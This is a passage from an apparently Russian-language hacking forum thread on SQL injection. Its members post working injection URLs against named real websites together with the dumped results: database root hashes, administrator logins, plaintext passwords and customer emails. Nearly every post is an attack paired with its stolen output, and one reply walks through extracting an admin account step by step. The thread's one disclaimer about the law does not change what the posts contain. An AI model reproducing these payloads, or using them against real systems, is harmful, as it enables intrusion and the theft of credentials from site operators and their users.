SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.floraindia.com
    Code:
    http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(email+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+FROM+membermaster)--
    Code:
    http://www.floraindia.com/details.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(pwd+as+nvarchar)+FROM+users)--
    http://www.highwayafrica.ru.ac.za PR:5
    Code:
    http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5+from+mysql.user/*
    root:*78961DCFDA81834DF8D39AB3BDFD900D16809523
    Code:
    http://www.highwayafrica.ru.ac.za/page.cfm?pID=-1+union+select+1,2,unhex(hex(concat(username,0x3a,userpassword))),4,5+from+admin/*
    admin:highwayafrica

    Админка:
     
    2 people like this.
  2. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    neeblee.com
    Code:
    http://www.neeblee.com/plaincart/index.php?c=39&p=-33+union+select+1,concat_ws(0x3,user_name,user_password),3,4,5+from+tbl_user/*
     
    #5462 OptimaPrime, 22 May 2008
    Last edited: 22 May 2008
    2 people like this.
  3. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    arcdi.com
    Code:
    http://www.arcdi.com/trainers.php?id=-33+union+select+1,concat(username,0x3a,password),3,4,5+FROM+users%20--
     
    3 people like this.
  4. desTiny

    desTiny Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    1,006
    Likes Received:
    444
    Reputations:
    94
    случайно попал на сайт и заметил - может кто чёнть с ним придумает...
    blind sql inject:
    http://www.microstar.ru/program/products/notebook/nb/pro_nb_selling.php?UID=630%20and%201=1
     
    1 person likes this.
  5. †c0(aIn?†

    †c0(aIn?† Member

    Joined:
    4 May 2008
    Messages:
    14
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://www.globaleconomicgovernance.org/research.php?id=-1+union+select+1, concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7/*
    version: 5.0.45 log
    db name: db158065722
    user: [email protected]
     
    1 person likes this.
  6. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.landbigfish.com

    Code:
    http://www.landbigfish.com/tacklestore/showcase.cfm?PID=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2Bchar(58)%2Bcast(password+as+nvarchar)+FROM+AdminUsers)--
     
    3 people like this.
  7. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    yamaha-service.de
    Code:
    http://www.yamaha-service.de/cat1.php?archivset=1&newsset=&idcat1=-1+union+select+all+1,username,3,password,5+from+users--
     
    2 people like this.
  8. OptimaPrime

    OptimaPrime Banned

    Joined:
    30 Mar 2007
    Messages:
    307
    Likes Received:
    588
    Reputations:
    -61
    www.relevantmagazine.com
    Code:
    http://www.relevantmagazine.com/pc_article.php?id=-1+union+all+select+1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12,null,14,15,16,17,18,19,20+from+admin/*
     
  9. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    rib-racers.com
    Code:
    http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10/*
    5.0.45-log[email protected]ribs
    Code:
    http://www.rib-racers.com/index.php?id=-2+union+select+1,concat_ws(0x3,fname,sname,username,password),3,4,5,6,7,8,9,10+from+reg/*
    PeterJohnsonbloggs3823a5ee1f831626:peter
     
    4 people like this.
  10. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    284
    Likes Received:
    595
    Reputations:
    567
    Вот три хоста на одном сервере

    binar-design.biz
    Code:
    http://binar-design.biz/web/index.php?idk=5-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203a20,TABLE_SCHEMA,TABLE_NAME)),4,5,6 FROM INFORMATION_SCHEMA.TABLES-- f
    в бд никаких полезных таблиц нету :(



    mobilka.com.ua
    Code:
    http://mobilka.com.ua/games/download.php?id=393-1 AND 1=0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- d
    полезная таблица user в ней столбцы id,login,pass но похоже она пустая =\


    samba.org.ua
    Code:
    http://samba.org.ua/articles/?section=2-1 AND 1=0 UNION SELECT 1,2,COUNT(CONCAT_WS(0x203A20,TABLE_SCHEMA,TABLE_NAME)),4 FROM INFORMATION_SCHEMA.TABLES-- f
    это уже интереснее, три таблицы с юзерами:
    1)user пустая
    2)sis_users вот отседа:
    Code:
    Guest : Guest : 
    Petro : 6216f8a75fd5bb3d5f22b6f9958cdede3fc086c2 (111)
    Vlas : 011c945f30ce2cbafc452f39840f025693339c42 (1111)
    3)users из этой таблицы:
    Code:
    Vlas : 2a062126ee92cb96a03bef1eb1008c4d (armagedon)
    tema_c : 698d51a19d8a121ce581499d7b701668 (111)
    Uncnovn : 3f230640b78d7e71ac5514e57935eb69 (qazxsw)
     
    3 people like this.
  11. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.ub.bw
    Code:
    http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
    root:*523D4E56011212768221213AC39698CEC334CD28
    ubcms:3f29838236c2615f
    webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
    webadmin:5c42f6195bd93698
    mysql:*E74858DB86EBA20BC33D0AECAE8A8108C56B17FA
     
  12. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    chtoikak.com
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
    4.1.22-standardoptimasi_bw@localhostoptimasi_BeautyWorld
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat(user,0x3,pass),3,4,5,6,7,8+from+users+limit+1,1/*
    adminadmin ^^
    Code:
    http://chtoikak.com/index.php?id=882+union+select+1,concat_ws(0x3,login,passw,email),3,4,5,6,7,8+from+reg+limit+1,1/*
    vlapron260561954[email protected]
     
  13. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.mnsafetycouncil.org PR:5
    Code:
    http://www.mnsafetycouncil.org/products/product.cfm?PID=1+or+1=(SELECT+TOP+1+cast(LoginName+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+users)--
     
    3 people like this.
  14. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Http://npo.karelia.ru/ скока не копался ничего кроме
    Результаты поиска
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''''' at line 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%'' at line 1

    Вы искали - '''

    Совпадений не найдено, попробуйте изменить искомое слово.
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or e_text_full like '%'''%' ORDER BY e_id DESC limit 0,15' at line 1
    Может кто пограмотнее поможет!
    А я так просто учусь.. пока мало чего понимаю. Может подскажите сайтик на котором попрактиковатся можно..
     
  15. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.thefrantics.com/
    Code:
    http://www.thefrantics.com/index.cfm?PID=1+or+1=(SELECT+TOP+1+cast(Username+as+nvarchar)%2Bchar(58)%2Bcast(Password+as+nvarchar)+from+Users)--
     
  16. mefish

    mefish Elder - Старейшина

    Joined:
    13 Apr 2008
    Messages:
    33
    Likes Received:
    12
    Reputations:
    0
    to Assembler:

    http://npo.karelia.ru/admin

    PS: и не фурыкает чет, мож кто абразумит почему :rolleyes:
     
    1 person likes this.
  17. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    там бейсик авторризация. Скорее всего с базой не связано
     
  18. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    2Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
    Code:
    http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
    Версия БД 5 - можно свободно извлечь таблицы и столбцы.
    Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
    Code:
    http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
    Видим аккаунт администратора, где пароль в незашифрованном виде:
    Code:
    1:admin:nko:1
    Вот и все... Получился даже мини-FAQ :).

    P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах!
     
    1 person likes this.
  19. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.goalqpc.com/ PR:5
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+version(),2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
    root:*4148C7277489C55E5A3F49CD1D020FCBE8778C3A
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat_ws(0x3a,UserEmail,UserPassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+admin+limit+0,1/*
    [email protected]:deming123
    [email protected]:swissthins


    Админка:
    Юзеры:
    Code:
    http://www.goalqpc.com/shop_products_detail.cfm?PID=-1+union+select+concat(useremail,0x3a,userpassword),2,3,4,5,6,7,8,9,10,11,12,13,14+from+user+limit+8000,1/*
    ~8000 мемберов, пароли в открытом виде.
     
    1 person likes this.
  20. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Дом 3

    мда
     
    1 person likes this.
Thread Status:
Not open for further replies.